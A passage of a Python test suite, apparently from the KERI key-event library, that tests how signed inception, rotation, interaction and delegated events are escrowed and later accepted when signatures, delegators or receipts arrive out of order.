verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, sith=nxtsith, temp=True)
assert cst == nst == nxtsith
srdr = eventing.rotate(pre=kvr.prefixer.qb64,
keys=[verfer.qb64 for verfer in verfers],
sith=sith,
dig=kvr.serder.diger.qb64,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
sn=kvr.sn+1,
data=[])
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs, count=2)
msg.extend(counter.qb64b)
msg.extend(sigers[0].qb64b)
msg.extend(sigers[3].qb64b)
# apply msg to Kevery
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert kvr.serder.diger.qb64 != srdr.dig # key state not updated
# process escrow
kvy.processEscrowPartialSigs()
assert kvr.serder.diger.qb64 != srdr.dig # key state not updated
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
msg.extend(counter.qb64b)
msg.extend(sigers[1].qb64b)
# apply msg to Kevery
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert kvr.serder.diger.qb64 != srdr.dig # key state not updated
# get DTS set by escrow date time stamp on event
edtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
# process escrow
kvy.processEscrowPartialSigs()
assert kvr.serder.diger.qb64 == srdr.dig # key state updated
# get DTS set by first seen event acceptance date time stamp
adtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
# ensure accept time is later than escrow time, default timedelta is zero
assert (helping.fromIso8601(adtsb) - helping.fromIso8601(edtsb)) > datetime.timedelta()
# get first seen
fsdig = kvy.db.getFe(dbing.fnKey(pre, 3))
assert fsdig == srdr.digb
assert not os.path.exists(ks.path)
assert not os.path.exists(db.path)
"""End Test"""
def test_missing_delegator_escrow():
"""
Test missing delegator escrow
"""
# bob is the delegator del is bob's delegate
bobSalt = coring.Salter(raw=b'0123456789abcdef').qb64
delSalt = coring.Salter(raw=b'abcdef0123456789').qb64
psr = parsing.Parser()
with basing.openDB(name="bob") as bobDB, \
keeping.openKS(name="bob") as bobKS, \
basing.openDB(name="del") as delDB, \
keeping.openKS(name="del") as delKS:
# Init key pair managers
bobMgr = keeping.Manager(keeper=bobKS, salt=bobSalt)
delMgr = keeping.Manager(keeper=delKS, salt=delSalt)
# Init Keverys
bobKvy = eventing.Kevery(db=bobDB)
delKvy = eventing.Kevery(db=delDB)
# Setup Bob by creating inception event
verfers, digers, cst, nst = bobMgr.incept(stem='bob', temp=True) # algo default salty and rooted
bobSrdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
nxt=coring.Nexter(digs=[diger.qb64 for diger in digers]).qb64,
code=coring.MtrDex.Blake3_256)
bobPre = bobSrdr.ked["i"]
bobMgr.move(old=verfers[0].qb64, new=bobPre) # move key pair label to prefix
sigers = bobMgr.sign(ser=bobSrdr.raw, verfers=verfers)
msg = bytearray(bobSrdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
bobIcpMsg = msg # save for later
# apply msg to bob's Kevery
psr.parse(ims=bytearray(msg), kvy=bobKvy)
# bobKvy.process(ims=bytearray(msg)) # process local copy of msg
bobK = bobKvy.kevers[bobPre]
assert bobK.prefixer.qb64 == bobPre
assert bobK.serder.diger.qb64 == bobSrdr.dig
# Setup Del's inception event assuming that Bob's next event will be an ixn delegating event
verfers, digers, cst, nst = delMgr.incept(stem='del', temp=True) # algo default salty and rooted
seal = eventing.SealLocation(i=bobK.prefixer.qb64,
s="{:x}".format(bobK.sn+1),
t=coring.Ilks.ixn,
p=bobK.serder.diger.qb64)
delSrdr = eventing.delcept(keys=[verfer.qb64 for verfer in verfers],
delpre=bobPre,
nxt=coring.Nexter(digs=[diger.qb64 for diger in digers]).qb64)
delPre = delSrdr.ked["i"]
delMgr.move(old=verfers[0].qb64, new=delPre) # move key pair label to prefix
# Now create delegating event
seal = eventing.SealEvent(i=delPre,
s=delSrdr.ked["s"],
d=delSrdr.dig)
bobSrdr = eventing.interact(pre=bobK.prefixer.qb64,
dig=bobK.serder.diger.qb64,
sn=bobK.sn+1,
data=[seal._asdict()])
sigers = bobMgr.sign(ser=bobSrdr.raw, verfers=bobK.verfers)
msg = bytearray(bobSrdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
bobIxnMsg = msg
# apply msg to bob's Kevery
psr.parse(ims=bytearray(msg), kvy=bobKvy)
# bobKvy.process(ims=bytearray(msg)) # process local copy of msg
assert bobK.serder.dig == bobSrdr.dig # key state updated so event was validated
# now create msg with Del's delegated inception event
sigers = delMgr.sign(ser=delSrdr.raw, verfers=verfers)
msg = bytearray(delSrdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
counter = coring.Counter(code=coring.CtrDex.SealSourceCouples,
count=1)
msg.extend(counter.qb64b)
seqner = coring.Seqner(sn=bobK.sn)
msg.extend(seqner.qb64b)
msg.extend(bobSrdr.digb)
# apply Del's delegated inception event message to bob's Kevery
psr.parse(ims=bytearray(msg), kvy=bobKvy)
# bobKvy.process(ims=bytearray(msg)) # process local copy of msg
assert delPre in bobKvy.kevers # successfully validated
bobDelK = bobKvy.kevers[delPre] # delK in bobs kevery
assert bobDelK.delegated
assert bobDelK.serder.diger.qb64 == delSrdr.dig # key state updated so event was validated
couple = bobKvy.db.getAes(dbing.dgKey(delPre, delSrdr.dig))
assert couple == seqner.qb64b + bobSrdr.digb
# apply Del's inception msg to Del's Kevery
# Dels event will fail but will add to its escrow
psr.parse(ims=bytearray(msg), kvy=delKvy)
# delKvy.process(ims=bytearray(msg)) # process remote copy of msg
assert delPre not in delKvy.kevers
assert bobPre not in delKvy.kevers
escrows = delKvy.db.getPses(dbing.snKey(delPre, int(delSrdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == delSrdr.digb # escrow entry for event
escrow = delKvy.db.getPde(dbing.dgKey(delPre, delSrdr.dig))
assert escrow == seqner.qb64b + bobSrdr.digb # escrow entry for event
# verify Kevery process partials escrow is idempotent to previously escrowed events
# assuming not stale but nothing else has changed
delKvy.processEscrowPartialSigs()
assert delPre not in delKvy.kevers
assert bobPre not in delKvy.kevers
escrows = delKvy.db.getPses(dbing.snKey(delPre, int(delSrdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == delSrdr.digb # escrow entry for event
escrow = delKvy.db.getPde(dbing.dgKey(delPre, delSrdr.dig))
assert escrow == seqner.qb64b + bobSrdr.digb # escrow entry for event
# apply Bob's inception to Dels' Kvy
psr.parse(ims=bytearray(bobIcpMsg), kvy=delKvy)
# delKvy.process(ims=bytearray(bobIcpMsg)) # process remote copy of msg
assert bobPre in delKvy.kevers # message accepted
delKvy.processEscrowPartialSigs() # process escrow
assert delPre not in delKvy.kevers
escrows = delKvy.db.getPses(dbing.snKey(delPre, int(delSrdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == delSrdr.digb # escrow entry for event
escrow = delKvy.db.getPde(dbing.dgKey(delPre, delSrdr.dig))
assert escrow == seqner.qb64b + bobSrdr.digb # escrow entry for event
# apply Bob's delegating interaction to Dels' Kvy
psr.parse(ims=bytearray(bobIxnMsg), kvy=delKvy)
# delKvy.process(ims=bytearray(bobIxnMsg)) # process remote copy of msg
delKvy.processEscrowPartialSigs() # process escrows
assert delPre in delKvy.kevers # event removed from escrow
delK = delKvy.kevers[delPre]
assert delK.delegated
assert delK.serder.diger.qb64 == delSrdr.dig
couple = delKvy.db.getAes(dbing.dgKey(delPre, delSrdr.dig))
assert couple == seqner.qb64b + bobSrdr.digb
escrows = delKvy.db.getPses(dbing.snKey(delPre, int(delSrdr.ked["s"], 16)))
assert len(escrows) == 0
escrow = delKvy.db.getPde(dbing.dgKey(delPre, delSrdr.dig))
assert escrow is None
# Setup Del rotation event
verfers, digers, cst, nst = delMgr.rotate(pre=delPre, temp=True)
delSrdr = eventing.deltate(pre=bobDelK.prefixer.qb64,
keys=[verfer.qb64 for verfer in verfers],
dig=bobDelK.serder.diger.qb64,
sn=bobDelK.sn+1,
nxt=coring.Nexter(digs=[diger.qb64 for diger in digers]).qb64)
# Now create delegating interaction event
seal = eventing.SealEvent(i=bobDelK.prefixer.qb64,
s=delSrdr.ked["s"],
d=delSrdr.dig)
bobSrdr = eventing.interact(pre=bobK.prefixer.qb64,
dig=bobK.serder.diger.qb64,
sn=bobK.sn+1,
data=[seal._asdict()])
sigers = bobMgr.sign(ser=bobSrdr.raw, verfers=bobK.verfers)
msg = bytearray(bobSrdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
# apply msg to bob's Kevery
psr.parse(ims=bytearray(msg), kvy=bobKvy)
# bobKvy.process(ims=bytearray(msg)) # process local copy of msg
assert bobK.serder.diger.qb64 == bobSrdr.dig # key state updated so event was validated
# apply msg to del's Kevery
psr.parse(ims=bytearray(msg), kvy=delKvy)
# delKvy.process(ims=bytearray(msg)) # process remote copy of msg
assert delKvy.kevers[bobPre].serder.diger.qb64 == bobSrdr.dig
# now create msg from Del's delegated rotation event
sigers = delMgr.sign(ser=delSrdr.raw, verfers=verfers)
msg = bytearray(delSrdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
counter = coring.Counter(code=coring.CtrDex.SealSourceCouples,
count=1)
msg.extend(counter.qb64b)
seqner = coring.Seqner(sn=bobK.sn)
msg.extend(seqner.qb64b)
msg.extend(bobSrdr.digb)
# apply Del's delegated Rotation event message to del's Kevery
psr.parse(ims=bytearray(msg), kvy=delKvy)
# delKvy.process(ims=bytearray(msg)) # process remote copy of msg
assert delK.delegated
assert delK.serder.diger.qb64 == delSrdr.dig
couple = delKvy.db.getAes(dbing.dgKey(delPre, delSrdr.dig))
assert couple == seqner.qb64b + bobSrdr.digb
# apply Del's delegated Rotation event message to bob's Kevery
psr.parse(ims=bytearray(msg), kvy=bobKvy)
# bobKvy.process(ims=bytearray(msg)) # process local copy of msg
assert bobDelK.delegated
assert bobDelK.serder.diger.qb64 == delSrdr.dig # key state updated so event was validated
couple = bobKvy.db.getAes(dbing.dgKey(delPre, delSrdr.dig))
assert couple == seqner.qb64b + bobSrdr.digb
assert not os.path.exists(delKS.path)
assert not os.path.exists(delDB.path)
assert not os.path.exists(bobKS.path)
assert not os.path.exists(bobDB.path)
"""End Test"""
def test_out_of_order_escrow():
"""
Test out of order escrow
"""
salt = coring.Salter(raw=b'0123456789abcdef').qb64 # init wes Salter
psr = parsing.Parser()
# init event DB and keep DB
with basing.openDB(name="edy") as db, keeping.openKS(name="edy") as ks:
# Init key pair manager
mgr = keeping.Manager(keeper=ks, salt=salt)
# Init Kevery with event DB
kvy = eventing.Kevery(db=db)
# create inception event with 3 keys each in incept and next sets
# defaults are algo salty and rooted
sith = ["1/2", "1/2", "1/2"] # 2 of 3 but with weighted threshold
nxtsith = ["1/2", "1/2", "1/2"]
verfers, digers, cst, nst = mgr.incept(icount=3, isith=sith,
ncount=3, nsith=nxtsith,
stem='wes', temp=True)
assert cst == nst == sith
srdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
sith=sith,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
code=coring.MtrDex.Blake3_256)
pre = srdr.ked["i"]
icpdig = srdr.dig
mgr.move(old=verfers[0].qb64, new=pre) # move key pair label to prefix
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
icpmsg = bytearray(msg) # save copy for later
# create interaction event
srdr = eventing.interact(pre=pre, dig=icpdig, sn=1, data=[])
ixndig = srdr.dig
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
ixnmsg = bytearray(msg) # save copy for later
# Create rotation event
# get current keys as verfers and next digests as digers
sith = nxtsith # rotate so nxtsith is now current sith and need new nextsith
# 2 of first 3 and 1 of last 2
nxtsith = [["1/2", "1/2", "1/2"],["1/1", "1/1"]]
verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, sith=nxtsith, temp=True)
assert cst == sith
assert nst == nxtsith
srdr = eventing.rotate(pre=pre,
keys=[verfer.qb64 for verfer in verfers],
sith=sith,
dig=ixndig,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
sn=2,
data=[])
rotdig = srdr.dig
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
rotmsg = bytearray(msg) # save copy for later
# apply rotation msg to Kevery to process
psr.parse(ims=bytearray(rotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rotmsg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
assert len(escrows) == 1
assert escrows[0] == rotdig.encode("utf-8") # escrow entry for event
# verify Kevery process is idempotent to previously escrowed events
psr.parse(ims=bytearray(rotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rotmsg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
assert len(escrows) == 1
assert escrows[0] == rotdig.encode("utf-8") # escrow entry for event
# verify Kevery process out of order escrow is idempotent to previously escrowed events
# assuming not stale but nothing else has changed
kvy.processEscrowOutOfOrders()
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
assert len(escrows) == 1
assert escrows[0] == rotdig.encode("utf-8") # escrow entry for event
# apply ixn msg to Kevery to process
psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(ixnmsg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
assert len(escrows) == 1
assert escrows[0] == ixndig.encode("utf-8") # escrow entry for event
# verify Kevery process is idempotent to previously escrowed events
psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(ixnmsg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
assert len(escrows) == 1
assert escrows[0] == ixndig.encode("utf-8") # escrow entry for event
# verify Kevery process out of order escrow is idempotent to previously escrowed events
# assuming not stale but nothing else has changed
kvy.processEscrowOutOfOrders()
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
assert len(escrows) == 1
assert escrows[0] == ixndig.encode("utf-8") # escrow entry for event
# Process partials but stale escrow set Timeout to 0
kvy.TimeoutOOE = 0 # forces all escrows to be stale
time.sleep(0.001)
kvy.processEscrowOutOfOrders()
assert pre not in kvy.kevers # key state not updated
escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
assert len(escrows) == 0 # escrow gone
escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
assert len(escrows) == 0
# Now reset timeout so not zero and rsend events to reload escrow
kvy.TimeoutOOE = 3600
# re-apply rotation msg to Kevery to process
psr.parse(ims=bytearray(rotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rotmsg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
assert len(escrows) == 1
assert escrows[0] == rotdig.encode("utf-8") # escrow entry for event
# re-apply ixn msg to Kevery to process
psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(ixnmsg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
assert len(escrows) == 1
assert escrows[0] == ixndig.encode("utf-8") # escrow entry for event
# re-apply inception msg to Kevery to process
psr.parse(ims=bytearray(icpmsg), kvy=kvy)
# kvy.process(ims=bytearray(icpmsg)) # process local copy of msg
assert pre in kvy.kevers # event accepted
kvr = kvy.kevers[pre]
assert kvr.serder.dig == icpdig # key state updated so event was validated
assert kvr.sn == 0 # key state successfully updated
# verify escrows not changed
escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
assert len(escrows) == 1
assert escrows[0] == rotdig.encode("utf-8") # escrow entry for event
escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
assert len(escrows) == 1
assert escrows[0] == ixndig.encode("utf-8") # escrow entry for event
# Process out of order escrow
# assuming not stale but nothing else has changed
kvy.processEscrowOutOfOrders()
assert kvr.serder.dig == rotdig # key state updated so event was validated
assert kvr.sn == 2 # key state successfully updated
escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
assert len(escrows) == 0 # escrow gone
escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
assert len(escrows) == 0
assert not os.path.exists(ks.path)
assert not os.path.exists(db.path)
"""End Test"""
def test_unverified_receipt_escrow():
"""
Test unverified receipt escrow
"""
salt = coring.Salter(raw=b'0123456789abcdef').qb64 # init Salter
psr = parsing.Parser()
# init event DB and keep DB
with basing.openDB(name="edy") as db, keeping.openKS(name="edy") as ks:
# Init key pair manager
mgr = keeping.Manager(keeper=ks, salt=salt)
# Init Kevery with event DB
kvy = eventing.Kevery(db=db)
# create witness identifiers
verfers, digers, cst, nst = mgr.incept(ncount=0, stem="wit0",
transferable=False, temp=True)
wit0Verfer = verfers[0]
wit0pre = wit0Verfer.qb64
verfers, digers, cst, nst = mgr.incept(ncount=0, stem="wit1",
transferable=False, temp=True)
wit1Verfer = verfers[0]
wit1pre = wit1Verfer.qb64
assert wit1pre != wit0pre
# create inception event with 3 keys each in incept and next sets
# defaults are algo salty and rooted
sith = ["1/2", "1/2", "1/2"] # 2 of 3 but with weighted threshold
nxtsith = ["1/2", "1/2", "1/2"]
verfers, digers, cst, nst = mgr.incept(icount=3, isith=sith,
ncount=3, nsith=nxtsith,
stem='edy', temp=True)
assert cst == nst == sith
srdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
sith=sith,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
code=coring.MtrDex.Blake3_256)
pre = srdr.ked["i"]
icpdig = srdr.dig
mgr.move(old=verfers[0].qb64, new=pre) # move key pair label to prefix
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
icpmsg = msg
# create receipt(s) of inception message
reserder = eventing.receipt(pre=pre, sn=0, dig=srdr.dig)
# sign event not receipt with wit0
wit0Cigar = mgr.sign(ser=srdr.raw, verfers=[wit0Verfer], indexed=False)[0] # returns Cigar unindexed
wit1Cigar = mgr.sign(ser=srdr.raw, verfers=[wit1Verfer], indexed=False)[0] # returns Cigar unindexed
recnt = coring.Counter(code=coring.CtrDex.NonTransReceiptCouples, count=2)
msg = bytearray()
msg.extend(reserder.raw)
msg.extend(recnt.qb64b)
msg.extend(wit0pre.encode("utf-8"))
msg.extend(wit0Cigar.qb64b)
msg.extend(wit1pre.encode("utf-8"))
msg.extend(wit1Cigar.qb64b)
rcticpmsg = msg
# Process receipt by kvy
psr.parse(ims=bytearray(rcticpmsg), kvy=kvy)
# kvy.process(ims=bytearray(rcticpmsg)) # process local copy of msg
assert pre not in kvy.kevers # no events yet for pre
escrows = kvy.db.getUres(dbing.snKey(pre, 0)) # so escrowed receipts
assert len(escrows) == 2
diger, prefixer, cigar = eventing.deReceiptTriple(escrows[0])
assert diger.qb64 == srdr.dig
assert prefixer.qb64 == wit0pre
assert cigar.qb64 == wit0Cigar.qb64
diger, prefixer, cigar = eventing.deReceiptTriple(escrows[1])
assert diger.qb64 == srdr.dig
assert prefixer.qb64 == wit1pre
assert cigar.qb64 == wit1Cigar.qb64
# create interaction event
srdr = eventing.interact(pre=pre, dig=icpdig, sn=1, data=[])
ixndig = srdr.dig
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
ixnmsg = msg
# create receipt(s) of interaction message
reserder = eventing.receipt(pre=pre, sn=1, dig=srdr.dig)
# sign event not receipt with wit0
wit0Cigar = mgr.sign(ser=srdr.raw, verfers=[wit0Verfer], indexed=False)[0] # returns Cigar unindexed
wit1Cigar = mgr.sign(ser=srdr.raw, verfers=[wit1Verfer], indexed=False)[0] # returns Cigar unindexed
recnt = coring.Counter(code=coring.CtrDex.NonTransReceiptCouples, count=2)
msg = bytearray()
msg.extend(reserder.raw)
msg.extend(recnt.qb64b)
msg.extend(wit0pre.encode("utf-8"))
msg.extend(wit0Cigar.qb64b)
msg.extend(wit1pre.encode("utf-8"))
msg.extend(wit1Cigar.qb64b)
rctixnmsg = msg
# Process receipt by kvy
psr.parse(ims=bytearray(rctixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(rctixnmsg)) # process local copy of msg
assert pre not in kvy.kevers # no events yet for pre
escrows = kvy.db.getUres(dbing.snKey(pre, 1)) # so escrowed receipts
assert len(escrows) == 2
diger, prefixer, cigar = eventing.deReceiptTriple(escrows[0])
assert diger.qb64 == srdr.dig
assert prefixer.qb64 == wit0pre
assert cigar.qb64 == wit0Cigar.qb64
diger, prefixer, cigar = eventing.deReceiptTriple(escrows[1])
assert diger.qb64 == srdr.dig
assert prefixer.qb64 == wit1pre
assert cigar.qb64 == wit1Cigar.qb64
# Create rotation event
# get current keys as verfers and next digests as digers
verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, temp=True)
sith = nxtsith # rotate so nxtsith is now current sith and need new nextsith
# 2 of first 3 and 1 of last 2
nxtsith = [["1/2", "1/2", "1/2"],["1/1", "1/1"]]
srdr = eventing.rotate(pre=pre,
keys=[verfer.qb64 for verfer in verfers],
sith=sith,
dig=ixndig,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
sn=2,
data=[])
rotdig = srdr.dig
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
rotmsg = msg
# create receipt(s) of rotation message
reserder = eventing.receipt(pre=pre, sn=2, dig=srdr.dig)
# sign event not receipt with wit0
wit0Cigar = mgr.sign(ser=srdr.raw, verfers=[wit0Verfer], indexed=False)[0] # returns Cigar unindexed
wit1Cigar = mgr.sign(ser=srdr.raw, verfers=[wit1Verfer], indexed=False)[0] # returns Cigar unindexed
recnt = coring.Counter(code=coring.CtrDex.NonTransReceiptCouples, count=2)
msg = bytearray()
msg.extend(reserder.raw)
msg.extend(recnt.qb64b)
msg.extend(wit0pre.encode("utf-8"))
msg.extend(wit0Cigar.qb64b)
msg.extend(wit1pre.encode("utf-8"))
msg.extend(wit1Cigar.qb64b)
rctrotmsg = msg
# Process receipt by kvy
psr.parse(ims=bytearray(rctrotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rctrotmsg)) # process local copy of msg
assert pre not in kvy.kevers # no events yet for pre
escrows = kvy.db.getUres(dbing.snKey(pre, 2)) # so escrowed receipts
assert len(escrows) == 2
diger, prefixer, cigar = eventing.deReceiptTriple(escrows[0])
assert diger.qb64 == srdr.dig
assert prefixer.qb64 == wit0pre
assert cigar.qb64 == wit0Cigar.qb64
diger, prefixer, cigar = eventing.deReceiptTriple(escrows[1])
assert diger.qb64 == srdr.dig
assert prefixer.qb64 == wit1pre
assert cigar.qb64 == wit1Cigar.qb64
# Process out of unverified but stale escrow set Timeout to 0
kvy.TimeoutURE = 0 # forces all escrows to be stale
time.sleep(0.001)
kvy.processEscrowUnverNonTrans()
assert pre not in kvy.kevers # key state not updated
# check escrows removed
assert len(kvy.db.getUres(dbing.snKey(pre, 0))) == 0
assert len(kvy.db.getUres(dbing.snKey(pre, 1))) == 0
assert len(kvy.db.getUres(dbing.snKey(pre, 2))) == 0
# Now reset timeout so not zero and resend receipts to reload escrow
kvy.TimeoutURE = 3600
# Process receipt by kvy
psr.parse(ims=bytearray(rcticpmsg), kvy=kvy)
# kvy.process(ims=bytearray(rcticpmsg)) # process local copy of msg
psr.parse(ims=bytearray(rctixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(rctixnmsg)) # process local copy of msg
psr.parse(ims=bytearray(rctrotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rctrotmsg)) # process local copy of msg
assert pre not in kvy.kevers # no events yet for pre
# assert Ure escrows are back
assert len(kvy.db.getUres(dbing.snKey(pre, 0))) == 2
assert len(kvy.db.getUres(dbing.snKey(pre, 1))) == 2
assert len(kvy.db.getUres(dbing.snKey(pre, 2))) == 2
# apply inception msg to Kevery to process
psr.parse(ims=bytearray(icpmsg), kvy=kvy)
# kvy.process(ims=bytearray(icpmsg)) # process local copy of msg
assert pre in kvy.kevers # event accepted
kvr = kvy.kevers[pre]
assert kvr.serder.dig == icpdig # key state updated so event was validated
assert kvr.sn == 0 # key state successfully updated
# apply ixn msg to Kevery to process
psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
# kvy.process(ims=bytearray(ixnmsg)) # process local copy of msg
assert kvr.serder.dig == ixndig # key state updated so event was validated
assert kvr.sn == 1 # key state successfully updated
# apply rotation msg to Kevery to process
psr.parse(ims=bytearray(rotmsg), kvy=kvy)
# kvy.process(ims=bytearray(rotmsg)) # process local copy of msg
assert kvr.serder.dig == rotdig # key state updated so event was validated
assert kvr.sn == 2 # key state successfully updated
# assert Ure escrows have not changed
assert len(kvy.db.getUres(dbing.snKey(pre, 0))) == 2
assert len(kvy.db.getUres(dbing.snKey(pre, 1))) == 2
assert len(kvy.db.getUres(dbing.snKey(pre, 2))) == 2
# verify Kevery process unverified receipt escrow i
# assuming not stale but nothing else has changed
kvy.processEscrowUnverNonTrans()
# check escrows removed
assert len(kvy.db.getUres(dbing.snKey(pre, 0))) == 0
assert len(kvy.db.getUres(dbing.snKey(pre, 1))) == 0
assert len(kvy.db.getUres(dbing.snKey(pre, 2))) == 0
# verify receipts
receipts = kvy.db.getRcts(dbing.dgKey(pre, icpdig))
assert len(receipts) == 2
rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[0])
assert rctPrefixer.qb64 == wit0pre
rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[1])
assert rctPrefixer.qb64 == wit1pre
receipts = kvy.db.getRcts(dbing.dgKey(pre, ixndig))
assert len(receipts) == 2
rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[0])
assert rctPrefixer.qb64 == wit0pre
rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[1])
assert rctPrefixer.qb64 == wit1pre
receipts = kvy.db.getRcts(dbing.dgKey(pre, rotdig))
assert len(receipts) == 2
rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[0])
assert rctPrefixer.qb64 == wit0pre
rctPrefixer, rctCigar = eventing.deReceiptCouple(receipts[1])
assert rctPrefixer.qb64 == wit1pre
assert not os.path.exists(ks.path)
assert not os.path.exists(db.path)
"""End Test"""
def test_unverified_trans_receipt_escrow():
"""
Test unverified transferable receipt escrow
"""
salt = coring.Salter(raw=b'0123456789abcdef').qb64 # init Salter
psr = parsing.Parser()
# init event DB and keep DB
with basing.openDB(name="edy") as db, keeping.openKS(name="edy") as ks:
# Init key pair manager
mgr = keeping.Manager(keeper=ks, salt=salt)
# Init Kevery with event DB
kvy = eventing.Kevery(db=db)
# create inception event with 3 keys each in incept and next sets
# defaults are algo salty and rooted
sith = ["1/2", "1/2", "1/2"] # 2 of 3 but with weighted threshold
nxtsith = ["1/2", "1/2", "1/2"]
verfers, digers, cst, nst = mgr.incept(icount=3, isith=sith,
ncount=3, nsith=nxtsith,
stem='edy', temp=True)
assert cst == nst == sith
srdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
sith=sith,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
code=coring.MtrDex.Blake3_256)
pre = srdr.ked["i"]
icpdig = srdr.dig
mgr.move(old=verfers[0].qb64, new=pre) # move key pair label to prefix
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
icpmsg = msg
# create receipter (validator) inception keys 2 of 3
rverfers, rdigers, cst, nst = mgr.incept(icount=3, ncount=3, stem='ray', temp=True)
rsith = '2'
# create recepter's inception event
